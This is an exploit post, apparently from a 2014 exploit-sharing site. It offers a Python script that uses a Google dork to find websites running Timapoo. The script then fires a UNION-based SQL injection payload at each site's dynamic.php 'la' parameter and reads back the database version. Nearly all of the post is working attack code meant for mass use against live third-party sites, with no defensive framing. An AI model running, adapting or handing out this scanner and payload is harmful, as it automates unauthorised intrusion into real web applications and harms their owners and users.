facebook facebook twitter rss

Timapoo SQLi [Google BOT with python]

Author: UzunDz , Published: 01-05-2014
Hello All

First you need to install google module

Link : https://pypi.python.org/pypi/google

Exploit Code :

#!C:\Python27\python.exe
'''
by Ali , UzunDz
UzunDz[at]gmail[dot]com
Sec4ever.com , dz-root.com
x00x-Team.
Vuln : Timapoo SQLi
'''
from google import search
import urllib2,re

def exploit_url(url):
try :
exp = "dynamic.php?sys=faq&la=' div 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x555a55,version(),0x4e445a),14,15,16%23"
target = re.sub('dynamic.php(.*)','',url)
print "Trying to inject : "+target
run = urllib2.urlopen(target+exp.replace(' ','%20')).read()
print "Version : "+re.findall('UZU(.*)NDZ',run)[0]
except :
pass

dork = 'inurl:"dynamic.php?sys=faq" Powered by Timapoo'
for url in search(dork,stop=(100)):
if 'dynamic.php' in url:
exploit_url(url)

Like us on Facebook :